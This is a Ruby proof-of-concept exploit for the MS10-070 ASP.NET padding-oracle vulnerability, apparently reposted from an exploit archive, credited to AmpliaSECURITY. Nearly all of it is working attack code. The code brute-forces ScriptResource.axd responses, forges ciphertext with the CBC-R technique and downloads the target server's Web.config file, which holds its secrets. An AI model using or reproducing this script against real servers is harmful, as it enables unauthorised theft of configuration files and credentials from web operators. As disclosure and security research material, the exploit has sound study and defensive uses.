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MS10-070 ASP.NET Auto-Decryptor File Download Exploit
===================================================== MS10-070 ASP.NET Auto-Decryptor File Download Exploit ===================================================== #!/usr/bin/ruby -w # # aspx_ad_chotext_attack.rb # # Copyright (c) 2010 AmpliaSECURITY. All rights reserved # # http://www.ampliasecurity.com # Agustin Azubel - aazubel@ampliasecurity.com # # # MS10-070 ASPX proof of concept # Decrypt data using an auto decryptor bundled in the aspx framework # Encrypt data using Rizzo-Duong CBC-R technique # # Copyright (c) 2010 Amplia Security. All rights reserved. # # Unless you have express writen permission from the Copyright # Holder, any use of or distribution of this software or portions of it, # including, but not limited to, reimplementations, modifications and derived # work of it, in either source code or any other form, as well as any other # software using or referencing it in any way, may NOT be sold for commercial # gain, must be covered by this very same license, and must retain this # copyright notice and this license. # Neither the name of the Copyright Holder nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # require 'net/http' require 'uri' require 'rexml/document' $debugging = false module XArray def hex_inspect "[#{length}][ #{map { |x| x.hex_inspect }.join ", " } ]" end end class Array include XArray end require 'base64' class XBase64 def self.encode s s = Base64.encode64 s s = s.gsub '+', '-' s = s.gsub '/', '_' s = s.gsub "\n", '' s = s.gsub "\r", '' s = XBase64.encode_base64_padding s end def self.encode_base64_padding s padding_length = 0 padding_length += 1 while s[-1 - padding_length, 1] == "=" s[0..(-1 - padding_length)] + padding_length.to_s end def self.decode s s = s.gsub '-', '+' s = s.gsub '_', '/' s = self.decode_base64_padding s Base64.decode64 s end def self.decode_base64_padding s padding_length = s[-1,1].to_i s[0...-1] + ("=" * padding_length) end end module XString def xor other raise RuntimeError, "length mismatch" if self.length != other.length (0...length).map { |i| self[i] ^ other[i] }.map { |x| x.chr }.join end alias ^ :xor def hex_inspect printables = [ "\a", "\b", "\e", "\f", "\n", "\r", "\t", "\v" ] + \ (0x20..0x7e).entries "[#{length}]" + "\"#{unpack("C*").map { |x| printables.include?(x) ? x.chr : "\\x%02x" % x }.join}\"" end def to_blocks blocksize (0...length/blocksize).map { |i| self[blocksize * i, blocksize]} end end class String include XString end class ASPXAutoDecryptorChosenCiphertextAttack attr_reader :uri attr_reader :filename attr_reader :min_filelength attr_reader :filere attr_reader :http attr_reader :d_value attr_reader :blocksize attr_reader :padding_length attr_reader :decrypt_command_mask attr_reader :axdpath attr_reader :axdname attr_reader :base_mask def initialize parameters @uri = URI.parse parameters[:uri] @filename = parameters[:filename] @min_filelength = parameters[:min_filelength] @filere = parameters[:filere] @http = http_initialize @d_value = nil @base_mask = rand 0xffff @decrypt_command_mask = nil @blocksize = nil @padding_length = nil @axdpath = nil @axdname = nil puts "target: #{@uri}" puts "base_mask: 0x%04x" % @base_mask end def http_initialize http = Net::HTTP.new @uri.host, @uri.port http.start http end def parse_script_tag xml, re d = nil doc = REXML::Document.new xml doc.elements.each 'script' do |e| src_attribute = e.attributes['src'] md = re.match src_attribute d = md[1] break end raise RuntimeError, "could not parse script_tag" unless d d end private :parse_script_tag def get_ciphertext_sample [ [ "ScriptResource.axd", /\/ScriptResource\.axd\?d=([a-zA-Z0-9\-\_]+)\&t=[a-z0-9]+/ ], ].each do |name, re| headers = { 'User-Agent' => \ 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' } response = http.get uri.path, headers body = response.body script_tags = body.lines.select { |x| x.index name } next if script_tags.empty? puts "script tags using #{name} [#{script_tags.length}]:" puts script_tags.map { |x| "\t#{x}" } d = parse_script_tag script_tags[0], re puts "using script: #{name}" puts "using d_value: #{d}" @axdpath = uri.path[0, uri.path.rindex('/')] @axdname = name @d_value = ("\x00" * 16) + (XBase64.decode d) break end raise RuntimeError, "could not find any axd sample" unless d_value d_value end def parse_html_body h, body parsed = String.new doc = REXML::Document.new body doc.elements.each h do |e| parsed = e.text break end parsed end def send_request d request = Net::HTTP::Get.new "/#{axdpath}/#{axdname}?d=#{XBase64.encode d}" request['Connection'] = 'Keep-Alive' @http.request request end def decrypt d ciphertext = d.clone ciphertext[0, 2] = [ @decrypt_command_mask ].pack "S" response = send_request ciphertext parse_html_body 'html/head/title', response.body end def discover_decrypt_command puts "discovering decrypt command..." ciphertext = d_value.clone 1.upto 0xffff do |mask| ciphertext[0, 2] = [ base_mask + mask ].pack "S" response = send_request ciphertext print "\rtrying decrypt_mask: 0x%04x/0xffff, http_code: %4d, body_length: %5d" % \ [ mask, response.code, response.body.length ] next unless response.code == "200" begin puts parse_html_body 'html/head/title', response.body @decrypt_command_mask = base_mask + mask rescue Exception => e puts e puts "exception !" next end break end puts raise RuntimeError, "no more combinations to try !" unless decrypt_command_mask puts "decrypted !!!" decrypt_command_mask end def discover_blocksize_and_padding_length puts "discovering blocksize and padding length..." [ 16, 8 ].each do |b| 0.upto b - 1 do |i| ciphertext = @d_value.clone ciphertext[-(b * 2) + i] ^= 0x01 begin decrypt ciphertext rescue Exception => e @blocksize = b @padding_length = blocksize - i break end end break if blocksize end raise RuntimeError, "no more combinations to try !" unless blocksize puts "discovered padding length: #{padding_length}" puts "discovered blocksize: #{blocksize}" [ blocksize, padding_length] end def reallocate_cipher_blocks cipher_blocks, new_plaintext_blocks puts "cipher_blocks.count: #{cipher_blocks.count}" required_block_count = 1 + new_plaintext_blocks.count + 1 puts "required_block_count: #{required_block_count}" if required_block_count < cipher_blocks.count then delta = cipher_blocks.count - required_block_count puts "removing #{delta} extra blocks..." cipher_blocks = [ cipher_blocks[0] ] + cipher_blocks[-required_block_count+1..-1] elsif required_block_count > cipher_blocks.count then delta = required_block_count - cipher_blocks.count puts "adding #{delta} extra_blocks..." cipher_blocks = [ cipher_blocks[0], ("\x00" * blocksize) * delta ] + cipher_blocks[1..-1] end puts "cipher_blocks.count: #{cipher_blocks.count}" cipher_blocks end private :reallocate_cipher_blocks def generate_new_plaintext_blocks tail_padding = "\x01" head_padding_length = blocksize - ( (@filename.length + tail_padding.length) % blocksize) head_padding_length = 0 if head_padding_length == blocksize head_padding = "\x00" * head_padding_length new_plaintext = head_padding + @filename + tail_padding new_plaintext.to_blocks blocksize end private :generate_new_plaintext_blocks def encrypt puts "encrypting \"#{@filename.hex_inspect}..." new_plaintext_blocks = generate_new_plaintext_blocks cipher_blocks = @d_value.to_blocks blocksize cipher_blocks = reallocate_cipher_blocks cipher_blocks, new_plaintext_blocks (1..new_plaintext_blocks.count).each do |i| puts "round #{i} of #{new_plaintext_blocks.count}" new_plaintext_block = new_plaintext_blocks[-i] old_cleartext = decrypt cipher_blocks.join old_plaintext = old_cleartext + (padding_length.chr * padding_length) puts "old_plaintext: #{old_plaintext.hex_inspect}" old_plaintext_blocks = old_plaintext[blocksize * (-i - 1)..-1].to_blocks blocksize old_plaintext_block = old_plaintext_blocks[-i] normalization_table = old_plaintext_block.bytes.map { |x| x >= 0x80 or x == 0x0a } if normalization_table.include? true j = blocksize - (normalization_table.rindex true) cipher_blocks[-1 - i][-j] ^= old_plaintext_block[-j] puts "normalization needed for \"\\x%x\", j: %d !" % [ old_plaintext_block[-j], -j] redo end cipher_blocks[-1 - i] ^= old_plaintext_block ^ new_plaintext_block @padding_length = 1 if i == 1 end cleartext = decrypt cipher_blocks.join puts "new cleartext: #{cleartext.hex_inspect}" # raise RuntimeError, "too many \"|\" characters!" if cleartext.count("|") > 3 @d_value = cipher_blocks.join end def discover_escape_sequence puts "discovering escape sequence..." escape_sequence_mask = nil offset = base_mask % (blocksize - 4) ciphertext = d_value.clone 0x1ffff.times do |mask| ciphertext[offset, 4] = [ base_mask + mask ].pack "L" response = send_request ciphertext print "\rtrying escape_mask: 0x%04x/0x1ffff, http_code: %4d, body_length: %5d" % \ [ mask, response.code, response.body.length ] next unless response.code == "200" next if min_filelength and (response.body.length < min_filelength) next if filere and (not filere =~ response.body) escape_sequence_mask = base_mask + mask puts puts "found!" unless $debugging puts "press any key to show the contents of the file" $stdin.gets end puts response.body break end puts raise RuntimeError, "no more combinations to try !" unless escape_sequence_mask escape_sequence_mask end def pause return if $debugging puts puts "press any key to start the attack" $stdin.gets end def run get_ciphertext_sample pause discover_decrypt_command discover_blocksize_and_padding_length encrypt discover_escape_sequence end end puts [ "-------------------------------------------", "aspx_ad_chotext_attack.rb", "(c) 2010 AmpliaSECURITY", "http://www.ampliasecurity.com", "Agustin Azubel - aazubel@ampliasecurity.com", "-------------------------------------------", "\n" ].join "\n" if ARGV.length != 1 then $stderr.puts "usage: ruby #{$PROGRAM_NAME}" exit end begin parameters = { :uri => ARGV.first, :filename => "|||~/Web.config", # :min_filelength => 3000, :filere => /configuration/ } x = ASPXAutoDecryptorChosenCiphertextAttack.new parameters x.run rescue Exception => e $stderr.puts "Exploit failed: #{e}" raise if $debugging end # 0day.today [2024-12-26] #